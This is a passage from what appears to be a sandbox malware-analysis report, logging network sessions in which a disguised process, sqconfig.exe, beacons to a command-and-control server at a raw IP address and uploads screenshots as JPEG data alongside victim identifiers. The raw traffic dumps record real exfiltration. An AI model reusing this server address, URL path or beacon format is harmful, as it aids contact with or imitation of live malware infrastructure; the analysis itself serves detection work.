                                                                  Sep 30, 2021 23:53:34.693080902 CEST17047OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:34.693262100 CEST17053OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:34.693619013 CEST17059OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:34.815522909 CEST17067OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:34.815589905 CEST17078OUTData Raw: ad 1e ca 7d 85 ed a1 dc a1 4e e2 af 0d 38 fa d2 8d 38 fa d5 7b 19 76 13 ad 0e e5 0a 2a ff 00 f6 71 f5 a5 fe ce 3e a2 8f 65 2e c1 ed a3 dc a1 4e ab c3 4e 3e b4 e1 a7 1f 5a af 63 2e c4 fb 68 77 33 e9 2b 48 69 a7 d6 97 fb 30 fa d1 ec 66 2f 6f 0e e6
                                                                  Data Ascii: }N88{v*q>e.NN>Zc.hw3+Hi0f/on)kQ4GZOUK>>E<VH_U{)3E_WSdZMav'44e/:zT/b)*V_YG^Ujjs8x@
                                                                  Sep 30, 2021 23:53:34.815615892 CEST17083OUTData Raw: 45 14 50 03 85 29 a6 8e b4 e3 d2 a8 42 51 45 14 84 14 a2 92 96 98 01 a7 0e 94 dc d2 d3 10 ea 29 0d 14 08 5a 51 d6 90 53 a9 83 0a 51 4d cd 28 34 c4 28 a7 52 0a 5e f4 c4 03 ad 06 8a 29 88 05 38 53 7b d2 d3 01 d4 a2 9a 29 73 8a 64 8b 4d 27 9a 09 a4
                                                                  Data Ascii: EP)BQE)ZQSQM(4(R^)8S{)sdM'1j@Ttbh)ZQb)p5Dv-;(<1Rka1iE%(DNBQE!8JMEe;IIhc4iNv"y-?HalHRB-IDP*%
                                                                  Sep 30, 2021 23:53:35.014508009 CEST17108INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:34 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  131192.168.2.34996491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:34.894438982 CEST17107OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:35.096451044 CEST17108INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:35 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  132192.168.2.34996591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:35.359041929 CEST17109OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:35.575053930 CEST17148INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:35 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  133192.168.2.34996691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:35.359261990 CEST17109OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:35.359482050 CEST17110OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:35.359695911 CEST17120OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:35.359864950 CEST17122OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:35.482986927 CEST17133OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:35.483023882 CEST17136OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:35.483036041 CEST17138OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:35.483211994 CEST17148OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:53:35.606441975 CEST17156OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:35.606492996 CEST17167OUTData Raw: ad 1e ca 7d 85 ed a1 dc a1 4e e2 af 0d 38 fa d2 8d 38 fa d5 7b 19 76 13 ad 0e e5 0a 2a ff 00 f6 71 f5 a5 fe ce 3e a2 8f 65 2e c1 ed a3 dc a1 4e ab c3 4e 3e b4 e1 a7 1f 5a af 63 2e c4 fb 68 77 33 e9 2b 48 69 a7 d6 97 fb 30 fa d1 ec 66 2f 6f 0e e6
                                                                  Data Ascii: }N88{v*q>e.NN>Zc.hw3+Hi0f/on)kQ4GZOUK>>E<VH_U{)3E_WSdZMav'44e/:zT/b)*V_YG^Ujjs8x@
                                                                  Sep 30, 2021 23:53:35.606528997 CEST17175OUTData Raw: 45 14 50 03 85 29 a6 8e b4 e3 d2 a8 42 51 45 14 84 14 a2 92 96 98 01 a7 0e 94 dc d2 d3 10 ea 29 0d 14 08 5a 51 d6 90 53 a9 83 0a 51 4d cd 28 34 c4 28 a7 52 0a 5e f4 c4 03 ad 06 8a 29 88 05 38 53 7b d2 d3 01 d4 a2 9a 29 73 8a 64 8b 4d 27 9a 09 a4
                                                                  Data Ascii: EP)BQE)ZQSQM(4(R^)8S{)sdM'1j@Ttbh)ZQb)p5Dv-;(<1Rka1iE%(DNBQE!8JMEe;IIhc4iNv"y-?HalHRB-IDP*%
                                                                  Sep 30, 2021 23:53:35.810492992 CEST17197INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:35 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  134192.168.2.34996791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:35.831828117 CEST17197OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:36.027467012 CEST17197INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:35 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:53:36.291284084 CEST17198OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:36.291368008 CEST17198OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:36.291574955 CEST17208OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:36.291663885 CEST17211OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:36.435059071 CEST17214OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:36.435164928 CEST17224OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:36.435404062 CEST17227OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:36.435425043 CEST17230OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:53:36.435439110 CEST17232OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:36.435524940 CEST17238OUTData Raw: c7 87 18 ff 00 d3 33 5e 2f 7e df be 73 fe d1 af 3b 28 5e f4 cf 7b 39 77 f6 7e 87 a1 59 71 f0 ee 0f a8 fe 75 cc c9 5d 25 a1 c7 c3 bb 6f 73 fd 6b 97 95 c8 27 da b4 c2 2f 7a 7e ac e4 cc dd 94 3d 11 13 92 0f 06 90 4b 20 e8 e4 7e 34 84 e6 9b 5e 8d 91
                                                                  Data Ascii: 3^/~s;(^{9w~Yqu]%osk'/z~=K ~4^;NrgOXoE.Hu,i'AMkI>bq+[2wqVE~5lCT<GsMu5XO-&<Jii-iD'kg/TF5W+9+zO7:&r#
                                                                  Sep 30, 2021 23:53:36.578984976 CEST17254OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:53:36.786695957 CEST17286INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:36 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  135192.168.2.34996891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:36.509499073 CEST17238OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:36.726291895 CEST17286INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:36 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  136192.168.2.34997091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:36.967307091 CEST17287OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:37.196049929 CEST17303INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:37 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  137192.168.2.34997191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:37.126485109 CEST17290OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:37.126877069 CEST17290OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:37.127094030 CEST17300OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:37.127228022 CEST17303OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:37.253132105 CEST17318OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
